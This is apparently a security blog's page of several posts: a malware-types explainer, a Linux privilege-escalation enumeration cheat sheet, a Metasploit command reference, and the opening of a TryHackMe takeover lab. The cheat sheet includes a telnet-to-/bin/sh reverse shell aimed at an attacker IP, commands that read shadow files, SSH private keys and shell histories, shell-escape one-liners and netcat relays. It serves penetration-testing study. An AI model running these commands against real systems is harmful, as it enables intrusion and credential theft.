Wednesday, 4 September 2024

What is Malware? And its Types



Malware is malicious software and refers to any software that is designed to cause harm to computer systems, networks, or users. Malware can take many forms. Individuals and organizations need to be aware of the different types of malware and take steps to protect their systems, such as using antivirus software, keeping software and systems up-to-date, and being cautious when opening email attachments or downloading software from the internet.

What is Malware?

Malware is software that gets into a system without the user's consent to steal private and confidential data, including bank details and passwords. It can also generate annoying pop-up ads and change system settings. Malware includes computer viruses, worms, Trojan horses, ransomware, spyware, and other malicious programs.

What Does Malware Do?

Malware is designed to harm and exploit your computer or network. It can steal sensitive information like passwords and credit card numbers, disrupt your system's operations, and even allow attackers to gain unauthorized access to your device. Some types of malware, such as ransomware, encrypt your files and demand payment to unlock them, while spyware monitors your activities and sends the information back to the attacker. Additionally, malware can spread to other devices on the same network, making it a significant threat. Protecting your devices with up-to-date antivirus software and being cautious about the links and attachments you open can help mitigate these risks.

Why Do Cybercriminals Use Malware?

Cybercriminals use malware, including all forms of malicious software such as viruses, for various purposes:

  • Using deception to induce a victim to provide personal information for identity theft
  • Theft of customer credit card information or other financial information
  • Taking over several computers and using them to launch denial-of-service attacks against other networks
  • Using infected computers to mine for cryptocurrencies like bitcoin

Types of Malware

  • Viruses – A Virus is a malicious executable code attached to another executable file. The virus spreads when an infected file is passed from system to system. Viruses can be harmless or they can modify or delete data. Opening a file can trigger a virus. Once a program virus is active, it will infect other programs on the computer.
  • Worms – Worms replicate themselves on the system, attaching themselves to different files and looking for pathways between computers, such as a computer network that shares common file storage areas. Worms usually slow down networks. A virus needs a host program to run, but worms can run by themselves. After a worm infects a host, it is able to spread very quickly over the network.
  • Trojan horse – A Trojan horse is malware that carries out malicious operations under the appearance of a desired operation such as playing an online game. A Trojan horse varies from a virus because the Trojan binds itself to non-executable files, such as image files, and audio files.
  • Ransomware – Ransomware holds a computer system, or the data it contains, hostage until the victim makes a payment. Ransomware encrypts data on the computer with a key that is unknown to the user. The user has to pay a ransom (price) to the criminals to retrieve the data. Once the amount is paid the victim can resume using his/her system.
  • Adware – It displays unwanted ads and pop-ups on the computer. It comes along with software downloads and packages. It generates revenue for the software distributor by displaying ads.
  • Spyware – Its purpose is to steal private information from a computer system for a third party. Spyware collects information and sends it to the hacker.
  • Logic Bombs – A logic bomb is a malicious program that uses a trigger to activate the malicious code. The logic bomb remains dormant until that trigger event happens. Once triggered, a logic bomb executes malicious code that causes harm to a computer. Cybersecurity specialists recently discovered logic bombs that attack and destroy the hardware components in a workstation or server, including the cooling fans, hard drives, and power supplies. The logic bomb overdrives these devices until they overheat or fail.
  • Rootkits – A rootkit modifies the OS to make a backdoor. Attackers then use the backdoor to access the computer remotely. Most rootkits take advantage of software vulnerabilities to modify system files.
  • Backdoors – A backdoor bypasses the usual authentication used to access a system. The purpose of the backdoor is to grant cyber criminals future access to the system even if the organization fixes the original vulnerability used to attack the system.
  • Keyloggers – A keylogger records everything the user types on his/her computer system to obtain passwords and other sensitive information and sends them to the source of the keylogging program.

How To Know If Our Devices Are Infected With Malware?

  • The computer performs poorly or runs noticeably slower than usual.
  • When your web browser directs you to a website you didn’t intend to visit, this is known as a browser redirect.
  • Warnings about infections are frequently accompanied by offers to buy a product to treat them.
  • Having trouble starting or shutting down your computer.
  • Persistent pop-up ads.

How To Protect From Malware?

  • Update your operating system and software. Install updates as soon as they become available because cybercriminals search for vulnerabilities in out-of-date or outdated software.
  • Never click on a popup’s link. Simply click the “X” in the message’s upper corner to close it and leave the page that generated it.
  • Don’t install too many apps on your devices. Install only the apps you believe you will regularly use and need.
  • Be cautious when using the internet.
  • Do not click on unidentified links. If a link seems suspicious, avoid clicking it whether it comes from an email, social networking site, or text message.
  • Choose the websites you visit wisely. Use a safe search plug-in and try to stick to well-known and reputable websites to avoid any that might be malicious without your knowledge.
  • Emails requesting personal information should be avoided. Do not click a link in an email that appears to be from your bank and asks you to do so in order to access your account or reset your password. Instead, log in directly at your online banking website.

How To Remove Malware?

A large number of security software programs are made to both find and stop malware as well as to eliminate it from infected systems. An antimalware tool that handles malware detection and removal is Malwarebytes. Malware can be eliminated from Windows, macOS, Android, and iOS operating systems. A user’s registry files, currently running programs, hard drives, and individual files can all be scanned by Malwarebytes. Malware can then be quarantined and removed if it is found. Users cannot, however, set automatic scanning schedules like they can with some other tools.

Tools Used to Remove Malware

  • Malwarebytes
  • SUPERAntiSpyware
  • Malicious Software Removal Tool (MSRT)
  • Bitdefender Antivirus Free Edition
  • Adaware Antivirus Free
  • Avast Free Mac Security

Advantages of Detecting and Removing Malware

  • Improved Security: By detecting and removing malware, individuals and organizations can improve the security of their systems and reduce the risk of future infections.
  • Prevent Data Loss: Malware can cause data loss, and by removing it, individuals and organizations can protect their important files and information.
  • Protect Reputation: Malware can cause harm to a company’s reputation, and by detecting and removing it, individuals and organizations can protect their image and brand.
  • Increased Productivity: Malware can slow down systems and make them less efficient, and by removing it, individuals and organizations can increase the productivity of their systems and employees.

Disadvantages of Detecting and Removing Malware

  • Time-Consuming: The process of detecting and removing malware can be time-consuming and require specialized tools and expertise.
  • Cost: Antivirus software and other tools required to detect and remove malware can be expensive for individuals and organizations.
  • False Positives: Malware detection and removal tools can sometimes result in false positives, causing unnecessary alarm and inconvenience.
  • Difficulty: Malware is constantly evolving, and the process of detecting and removing it can be challenging and require specialized knowledge and expertise.
  • Risk of Data Loss: Some malware removal tools can cause unintended harm, resulting in data loss or system instability.

Conclusion

In conclusion, malware poses significant risks to both individuals and organizations, requiring proactive measures for protection and removal. Using a combination of antivirus and anti-malware tools together with regular software updates can effectively protect systems. While detecting and removing malware can be time-consuming and costly, the benefits of enhanced security, data protection, and increased productivity outweigh those costs.

Monday, 26 February 2024

Basic Linux Privilege Escalation

Before starting, I would like to point out - I'm no expert. As far as I know, there isn't a "magic" answer in this huge area. This is simply my finding, typed up, to be shared (my starting point). Below is a mixture of commands to do the same thing, to look at things in a different place or just in a different light. I know there are more "things" to look for. It's just a basic & rough guide. Not every command will work for each system as Linux varies so much. "It" will not jump off the screen - you have to hunt for that "little thing" as "the devil is in the detail".

Enumeration is the key.

(Linux) privilege escalation is all about:

  • Collect - Enumeration, more enumeration and some more enumeration.
  • Process - Sort through data, analyse and prioritise.
  • Search - Know what to search for and where to find the exploit code.
  • Adapt - Customize the exploit so it fits. Not every exploit works for every system "out of the box".
  • Try - Get ready for (lots of) trial and error.

Operating System

What's the distribution type? What version?

cat /etc/issue
cat /etc/*-release
  cat /etc/lsb-release      # Debian based
  cat /etc/redhat-release   # Redhat based

What's the kernel version? Is it 64-bit?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environment variables?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?

lpstat -a

Applications & Services

What services are running? Which service has which user privilege?

ps aux
ps -ef
top
cat /etc/services

Which service(s) are being run by root? Of these services, which are vulnerable - it's worth a double check!

ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?

ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null

What jobs are scheduled?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla (single quotes so the shell does not expand $password)

Communications & Networking

What NIC(s) does the system have? Is it connected to another network?

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?

cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w

What's cached? IP and/or MAC addresses

arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic

tcpdump 'tcp and dst host 192.168.1.7 and dst port 80 or tcp and dst host 10.5.5.252 and dst port 21'

Note: tcpdump 'tcp and dst host [ip] and dst port [port] or tcp and dst host [ip] and dst port [port]'

Have you got a shell? Can you interact with the system?

nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attackers ip] 4444 | /bin/sh | telnet [attackers ip] 4445    # On the target's system. Use the attacker's IP and the two listening ports above!

Note: http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

Is port forwarding possible? Redirect and interact with traffic from another view

Note: http://www.boutell.com/rinetd/

Note: http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

Note: http://downloadcenter.mcafee.com/products/tools/foundstone/fpipe2_1.zip

Note: FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]

FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

Note: ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]

ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

Note: mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe

mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080), traffic logged to inflow/outflow
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe &    # Proxy monitor (Port 80 to 8080), backgrounded

Is tunnelling possible? Send commands locally, remotely

ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users

Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?

id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?

cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directory(ies)? If it's possible to access them

ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in scripts, databases, configuration files or log files? Default paths and locations for passwords

cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Is there any password in plain text? What have they been editing?

cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?

cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?

cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems

Which configuration files can be written in /etc/? Able to reconfigure a service?

ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null       # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null    # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null        # Other

find /etc/ -readable -type f 2>/dev/null               # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?

ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?

ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with "Local File Includes"!)

cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/

Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

Note: http://www.thegeekstuff.com/2011/08/linux-var-log-files/

If commands are limited, can you break out of the "jail" shell?

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')    # from inside a Python prompt, not the shell
/bin/sh -i

How are file-systems mounted?

mount
df -h

Are there any unmounted file-systems?

cat /etc/fstab

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & SGID

find / -perm -1000 -type d 2>/dev/null   # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here.
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) - run as the group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) - run as the owner, not the user who started it.

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID (parentheses so -type f applies to both)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

Where can files be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm

find / -writable -type d 2>/dev/null      # folders writeable by the current user
find / -perm -222 -type d 2>/dev/null     # world-writeable folders
find / -perm -o=w -type d 2>/dev/null     # world-writeable folders

find / -perm -o=x -type d 2>/dev/null     # world-executable folders

find / -perm -o=wx -type d 2>/dev/null    # world-writeable & executable folders

Any "problem" files? World-writeable, "nobody" files

find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no owner or no group

Preparation & Finding Exploit Code

What development tools/languages are installed/supported?

find / -name perl*
find / -name python*
find / -name gcc*
find / -name cc

How can files be uploaded?

find / -name wget
find / -name nc*
find / -name netcat*
find / -name tftp*
find / -name ftp

Finding exploit code

http://www.exploit-db.com

http://1337day.com

http://www.securiteam.com

http://www.securityfocus.com

http://www.exploitsearch.net

http://metasploit.com/modules/

http://securityreason.com

http://seclists.org/fulldisclosure/

http://www.google.com

Finding more information regarding the exploit

http://www.cvedetails.com

http://packetstormsecurity.org/files/cve/[CVE]

http://cve.mitre.org/cgi-bin/cvename.cgi?name=[CVE]

http://www.vulnview.com/cve-details.php?cvename=[CVE]

(Quick) "Common" exploits. Warning: pre-compiled binary files. Use at your own risk

http://web.archive.org/web/20111118031158/http://tarantula.by.ru/localroot/

http://www.kecepatan.66ghz.com/file/local-root-exploit-priv9/

Mitigations

Is any of the above information easy to find?

Try doing it! Set up a cron job which automates script(s) and/or 3rd party products
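Turning the SUID/SGID, world-writable and cron checks from the File Systems section into something a defender can schedule, as this mitigation suggests: an added example, not part of the original guide. It assumes a POSIX sh and a find(1) that accepts -maxdepth; the tree it builds under mktemp is constructed for the demonstration.

```sh
#!/bin/sh
# privesc_audit.sh: defender-side audit of the SUID/SGID, world-writable and cron
# findings enumerated above (added example, not part of the original guide).
# Assumes POSIX sh plus a find(1) that supports -maxdepth (GNU or BSD).

# Regular files with the SUID or SGID bit set under $1, sorted so runs can be diffed.
list_suid_sgid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Files and directories writable by everyone where no sticky bit protects entries
# from deletion or replacement (a 0777 directory is flagged; /tmp at 1777 is not).
list_world_writable() {
    find "$1" -xdev \( -type f -o -type d \) -perm -0002 ! -perm -1000 2>/dev/null | sort
}

# Save the current SUID/SGID inventory as a baseline ($1 = baseline file, $2 = root).
save_suid_baseline() {
    list_suid_sgid "$2" > "$1"
}

# Print SUID/SGID files present now that were absent from the baseline.
new_suid_since_baseline() {
    list_suid_sgid "$2" | comm -13 "$1" -
}

# Parse a system crontab ($1; fields: m h dom mon dow user command) and print
# "user path" for every command whose absolute path is world-writable, i.e. a
# job that anyone could edit and have run as that user. $2 is an optional root
# prefix so the check can be run against a copied tree.
cron_world_writable_commands() {
    crontab_file=$1
    prefix=${2:-}
    grep -Ev '^[[:space:]]*(#|$)' "$crontab_file" |
    while read -r min hr dom mon dow user cmd; do
        target=${cmd%% *}                 # first word of the command field
        case "$target" in
            /*) ;;                        # only absolute paths are checked
            *)  continue ;;               # VAR=value lines and relative names are skipped
        esac
        if [ -e "$prefix$target" ] &&
           [ -n "$(find "$prefix$target" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            echo "$user $target"
        fi
    done
}

# Build a small constructed tree so the checks can be exercised offline.
make_demo_tree() {
    umask 022
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/tmp" "$d/opt" "$d/etc"
    chmod 0755 "$d" "$d/usr" "$d/usr/bin" "$d/etc"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"   # SUID, expected
    : > "$d/usr/bin/wall";   chmod 2755 "$d/usr/bin/wall"     # SGID, expected
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"       # plain binary
    chmod 1777 "$d/tmp"                                       # sticky bit: fine
    chmod 0777 "$d/opt"                                       # finding
    : > "$d/opt/backup.sh";  chmod 0777 "$d/opt/backup.sh"    # finding, run by cron
    printf '%s\n' 'PATH=/usr/bin:/bin' '# nightly jobs' \
        '*/5 * * * * root /opt/backup.sh' \
        '0 2 * * * root /usr/bin/wall maintenance' > "$d/etc/crontab"
    chmod 0644 "$d/etc/crontab"
    echo "$d"
}

# Run the checks against a root directory; returns non-zero if anything is flagged,
# which makes the script usable as a cron job that mails output only on findings.
audit_root() {
    root=$1
    echo "== SUID/SGID files under $root =="
    list_suid_sgid "$root"
    echo "== world-writable without sticky bit under $root =="
    ww=$(list_world_writable "$root")
    echo "$ww"
    echo "== cron commands that are world-writable =="
    cw=$(cron_world_writable_commands "$root/etc/crontab" "$root")
    echo "$cw"
    [ -z "$ww" ] && [ -z "$cw" ]
}

# Usage: sh privesc_audit.sh /   (save a baseline once with save_suid_baseline, diff it nightly)
if [ -n "${1:-}" ]; then
    audit_root "$1"
fi
```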

Is the system fully patched?

Kernel, operating system, all applications, their plugins and web services

apt-get update && apt-get upgrade
yum update

Are services running with the minimum level of privileges required?

For example, do you need to run MySQL as root?

Scripts

Can any of this be automated?!

http://pentestmonkey.net/tools/unix-privesc-check/

http://labs.portcullis.co.uk/application/enum4linux/

http://bastille-linux.sourceforge.net

Other (quick) guides & Links

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

http://www.microloft.co.uk/hacking/hacking3.htm

Misc

http://jon.oberheide.org/files/stackjacking-infiltrate11.pdf

http://pentest.cryptocity.net/files/operations/2009/post_exploitation_fall09.pdf

http://insidetrust.blogspot.com/2011/04/quick-guide-to-linux-privilege.html

Monday, 27 November 2023

Metasploit Tutorial for Beginners

The Metasploit project is an open-source penetration testing platform that enables you to find and exploit vulnerabilities. In 2003, H.D. Moore created Metasploit as a portable network tool. On October 21, 2009, the Metasploit project was acquired by Rapid7.

The Metasploit project helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. The Metasploit project includes sub-projects such as the Metasploit Framework and its commercial counterparts: Metasploit Pro, Express, Community, and Nexpose Ultimate.

Minimum System Requirements:

  • 2 GHz+ Processor
  • 4 GB RAM (8 GB recommended)
  • 1 GB Disk space (50 GB recommended)

Supported Operating System:

  • Windows Server 2008, Server 2012
  • Windows 8.1, Windows 10
  • Red Hat Enterprise Linux 5.10, 6.5, 7.1 or later
  • Ubuntu Linux 14.04 or 16.04 LTS (recommended)

Required Browser version:

  • Google Chrome (latest)
  • Mozilla Firefox (latest)
  • Microsoft Internet Explorer 11

Basic Terms of Metasploit

Vulnerability: A vulnerability is a weakness which can be exploited by an attacker to perform unauthorized actions within a computer system. A vulnerability can be as simple as weak passwords or as complex as buffer overflows or SQL injection vulnerabilities.

Exploit: Exploit is a piece of code, or a chunk of data, or a sequence of commands that take the advantage of a vulnerability present in a computer system to cause unintended behavior to occur on a computer system such as giving unauthorized access to a system or allowing privilege escalation.

Payload: The payload is the part of the transmitted data that carries the actual intended content; in malware such as worms or viruses it is the part that performs the malicious action, such as deleting data, sending spam or encrypting data.

Auxiliary: Auxiliaries are modules present in Metasploit that are used to perform scanning, sniffing, and fuzzing. Auxiliary modules are not useful to give you a shell, but they are extremely useful to brute force passwords or for scanning vulnerabilities.

Post: Post modules are used for post exploitation that is used on a compromised target machine to gather evidence or pivot deep within the network.

Encoders: Encoder modules are used to ensure the payload makes it to the destination.

Nops: Nops are used to keep the size of the payload consistent across exploit attempts.

A cheat sheet of Basic Commands

To start the Metasploit framework we type msfconsole on the terminal. We are greeted by a banner; it spawns a banner every time we start the msfconsole.

msfconsole

After starting the Metasploit framework, we can check for the basic commands by using “help” command.

msf > help

Core Commands:

  • ? / help: Display the summary of commands that can be used in msfconsole.
  • banner: Change and display banner in msfconsole.
  • cd: Change the current working directory.
  • color: Enable or disable the color output of Metasploit. It has 3 options: “true”, “false” and “auto”.
  • connect: A netcat-like function for connecting to a host machine, built into msfconsole.
  • exit: Exit the Metasploit console.
  • get: Gets the value of a context-specific variable
  • getg: Gets the value of global variable
  • grep: It matches a given pattern from the output of another msfconsole command
  • history: Shows commands that were previously used in Metasploit
  • irb: Opens a live ruby interactive shell
  • load: Loads a Metasploit plugin
  • quit: Exit the Metasploit console
  • route: It allows you to route sockets through a session or ‘comm’, providing basic pivoting capabilities
  • save: This command allows you to save your current environment and settings
  • sessions: This command allows you to list, interact, and kill spawned sessions
  • set: This command allows you to configure Framework options and parameters for the current module that is selected on the console.
  • setg: This command is used to set global variables within msfconsole
  • sleep: Do nothing for the specified number of seconds
  • spool: It allows a user to save the output of Metasploit console to a specified file
  • threads: View and manipulate background threads
  • unload: unloads a previously loaded plugin and removes any extended commands
  • unset: It removes a parameter previously configured with set
  • unsetg: It removes a global variable inside msfconsole
  • version: Show the framework and console library version numbers

Module Commands:

  • advanced: It is used to further fine-tune a module, ‘show advanced’ displays a more advanced option for a module.
  • back: Once you have finished working with a particular module, or if you inadvertently select the wrong module, you can issue the back command to move out of the current context.
  • info: It provides detailed information about a particular module including all options, targets, and other information.
  • loadpath: It loads a third-party module tree for the path.
  • options: It shows you the available parameters for an exploit.
  • popm: It pops the pushed module from the top of the module stack.
  • previous: It sets the previously loaded module as the current module.
  • pushm: This command pushes the current module on to the stack.
  • reload_all: It reloads all modules from all defined module paths.
  • search: It searches module names and descriptions
  • show: This command displays modules of a given type, or displays all modules.
  • use: It is used to select a particular module.

Job Commands:

  • handler: It starts a payload handler in the background.
  • jobs: It is used to list jobs running in the background and terminate them.
  • kill: It kills any running job.
  • rename_job: It is used to rename a job

Resource Script Commands:

  • makerc: It saves commands entered to a specified rc file.
  • resource: It runs all the commands stored in the rc file.

Developer Commands:

  • edit: This command is used to edit the currently selected module.
  • log: It displays framework.log starting from the bottom.
  • reload_lib: This command is used to reload one or more library files from specified paths.

Database Backend Commands:

  • db_connect: It is used to connect to an existing database.
  • db_disconnect: It is used to disconnect from the current database instance.
  • db_export: It is used to export a file containing the contents of the database.
  • db_import: It is used to import a scan result file.
  • db_rebuild_cache: It is used to rebuild the database-stored module cache.
  • db_status: It shows the name of the currently connected database.
  • hosts: It lists all hosts in the database.
  • loot: It lists all loot in the database.
  • notes: It lists all notes in the database.
  • services: It lists all services in the database.
  • vulns: It lists all vulnerabilities in the database.
  • workspace: It helps to switch between database workspaces.

To see all the payloads that are available on the Metasploit framework we use command “show payloads”. It lists all the available payloads in alphabetic order.

msf > show payloads

To see all the exploits that are available on the Metasploit framework we use the command “show exploits”. It lists all the available exploits in alphabetic order and also shows the date each was disclosed and the rank of the exploit, ranging from “Excellent” down to “Average”.

msf > show exploits

To see the list of all the auxiliaries available in Metasploit framework we can use the command “show auxiliary”. As mentioned earlier, auxiliary modules include scanners, denial of service modules, fuzzers, and more.

msf > show auxiliary

To see the list of all the post-exploitation modules available in Metasploit framework we can use command “show post”. Post modules are used for post exploitation that is used on a compromised target machine to gather evidence or pivot deep within the network.

msf > show post

To see the list of all the encoders available in the Metasploit framework we can use the command “show encoders”. These are used to obfuscate modules to avoid detection by a protection mechanism such as an antivirus or a firewall.

msf > show encoders

To see the list of all the nops available in Metasploit framework we can use the command “show nops”. They are used to keep the size of payload consistent across exploit attempts.

msf > show nops

Wednesday, 22 November 2023

Take Over Lab from TryHackMe Platform

https://tryhackme.com/room/takeover

TakeOver

This challenge revolves around subdomain enumeration.

Task 1 Help Us

Hello there,

I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support.

Recently blackhat hackers approached us saying they could take over and are asking us for a big ransom. Please help us to find what they can take over.

Our website is located at https://futurevera.thm

Hint: Don't forget to add 10.10.49.201 to /etc/hosts for futurevera.thm ; )